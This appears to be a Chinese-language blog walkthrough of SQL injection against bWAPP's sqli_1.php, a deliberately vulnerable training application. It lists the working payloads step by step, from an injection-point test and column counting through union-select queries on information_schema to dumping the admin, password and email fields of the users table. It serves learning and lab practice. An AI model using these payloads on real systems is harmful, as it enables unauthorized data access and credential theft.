SQL注入之bWAPP之sqli_1.php

Posted 2020-10-28

1、测试有没有注入点，如果有是什么类型注入，首先在“title=1”后面加个单引号看结果，如下图：

报错中含有"%"提示，所以可以确定是搜索型SQL注入。
2、输入“title=1%‘and‘%‘=‘”或“title=1%‘or‘%‘=‘”，都未报错，且“title=1%‘or‘%‘=‘”显示页面如下：

接下来开始注入。
3、判断字段数：
输入“title=1%‘order by 7 --+”，页面返回正常；输入“title=1%‘order by 8 --+”，页面返回“Error: Unknown column ‘8‘ in ‘order clause‘”，说明字段数为7，如下图：

这里的注释符要用“--”而不是“#”，至于原因我也不知道，如果有大牛看到，希望不吝赐教。
4、查询数据库名等信息：
先看下显示的位置，输入：“title=1%‘union select 1,2,3,4,5,6,7 --+”，如下图：

接着输入“title=1%‘union select 1,database(),version(),4,user(),6,7 --+”查看数据库名，数据库版本，当前数据库用户，如下图：

5、查询表名：
输入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ --+”，结果如图：

很明显我们要查看users表。
6、查询字段名：
输入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ --+”，结果如下图：

users表中的字段计较多，我们重点关注admin、password、email三个字段。
7、查询字段内容：
输入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users --+”，结果如下图：

就以上这些步骤了，有兴趣的可以自己尝试其他表和其他字段。